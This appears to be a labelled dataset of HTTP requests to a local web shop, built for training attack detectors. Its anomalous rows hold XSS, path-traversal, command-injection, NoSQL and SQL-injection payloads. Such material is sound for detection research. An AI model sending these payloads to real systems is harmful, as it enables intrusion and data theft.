raw_request
stringlengths
198
5.73k
label
stringclasses
2 values
attack_type
stringclasses
9 values
GET / HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Pentest-Worker-1) Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Attack-Type: XSS Referer: http://127.0.0.1:3000/#/search?q=iPwCH Cookie: language=%3Ciframe%20src%3D%22javascript%3Aalert%281%29%22%3E; welcomebanner_status=dismiss
ANOMALOUS
XSS
GET /api/Quantitys/ HTTP/1.1 Host: 127.0.0.1:3000 Proxy-Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.0.0 Safari/537.36 Accept: application/json, text/plain, */* sec-ch-ua: "Google Chrome";v="143", "...
NORMAL
null
GET /rest/basket/NaN HTTP/1.1 Host: 127.0.0.1:3000 Proxy-Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Accept: application/json, text/plain, */* sec-ch-ua: "Google Chrome";v="143", "Chromiu...
NORMAL
null
GET /rest/products/search?q= HTTP/1.1 Host: 127.0.0.1:3000 Proxy-Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.0.0 Safari/537.36 Accept: application/json, text/plain, */* sec-ch-ua: "Google Chrome";v...
NORMAL
null
POST /rest/user/login HTTP/1.1 Host: 127.0.0.1:3000 Proxy-Connection: keep-alive Content-Length: 51 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.0.0 Safari/537.36 Accept: application/json, text/plain, */* sec-ch-ua: "Goog...
NORMAL
null
GET / HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Pentest-Worker-6) Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Attack-Type: LFI/Path Referer: http://127.0.0.1:3000/#/search?q=ODFdB Cookie: language=../../../../../../../../etc/passwd%00; welcomebanner_status=dismiss
ANOMALOUS
LFI/Path
GET /etc/passwd%20/*%20132%20*/ HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Pentest-Worker-10) Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Attack-Type: Path Referer: http://127.0.0.1:3000/#/search?q=xoRTO
ANOMALOUS
Path
GET /api/SecurityQuestions/ HTTP/1.1 Host: 127.0.0.1:3000 Proxy-Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.0.0 Safari/537.36 Accept: application/json, text/plain, */* sec-ch-ua: "Google Chrome";v=...
NORMAL
null
GET /rest/products/search?q=%3Cdetails/open/ontoggle=confirm(1)%3E HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Pentest-Worker-9) Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Attack-Type: XSS Referer: http://127.0.0.1:3000/#/search?q=WlCxJ
ANOMALOUS
XSS
GET / HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Pentest-Worker-10) Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Attack-Type: Command Referer: http://127.0.0.1:3000/#/search?q=yMcTs Cookie: language=& ping -c 10 127.0.0.1 /* 567 */; welcomebanner_status=dismiss
ANOMALOUS
Command
GET /rest/products/search?q=%7B%22$gt%22:%20%22%22%7D HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Pentest-Worker-2) Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Attack-Type: NoSQL Referer: http://127.0.0.1:3000/#/search?q=VWtAz
ANOMALOUS
NoSQL
GET /rest/admin/application-version HTTP/1.1 Host: 127.0.0.1:3000 Proxy-Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.0.0 Safari/537.36 Accept: application/json, text/plain, */* sec-ch-ua: "Google Ch...
NORMAL
null
GET /rest/products/search?q= HTTP/1.1 Host: 127.0.0.1:3000 Proxy-Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Accept: application/json, text/plain, */* sec-ch-ua: "Google Chrome";v="143", ...
NORMAL
null
GET /rest/products/search?q=%2527%2520OR%25202%252B2%253D4%2520-- HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Pentest-Worker-3) Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Attack-Type: SQL Referer: http://127.0.0.1:3000/#/search?q=XlNGT
ANOMALOUS
SQL
POST /rest/user/login HTTP/1.1 Host: 127.0.0.1:3000 Proxy-Connection: keep-alive Content-Length: 101 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.0.0 Safari/537.36 Accept: application/json, text/plain, */* sec-ch-ua: "Goo...
NORMAL
null
GET /rest/products/search?q=admin'%20AND%20(SELECT%201%20FROM%20(SELECT(COUNT(*),CONCAT(0x7e,(SELECT%20(ELT(1,1))),0x7e),x)FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20/*%20278%20*/ HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Pentest-Worker-6) Accept-Encoding: gzip, deflate Accept: */* Connectio...
ANOMALOUS
SQLi
GET /rest/products/search?q=admin'%20AND%20(SELECT%201%20FROM%20(SELECT(COUNT(*),CONCAT(0x7e,(SELECT%20(ELT(1,1))),0x7e),x)FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20/*%20789%20*/ HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Pentest-Worker-11) Accept-Encoding: gzip, deflate Accept: */* Connecti...
ANOMALOUS
SQL
GET /rest/products/search?q=%3Csvg/onload=alert(1)%3E HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Pentest-Worker-7) Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Attack-Type: XSS Referer: http://127.0.0.1:3000/#/search?q=kegHi
ANOMALOUS
XSS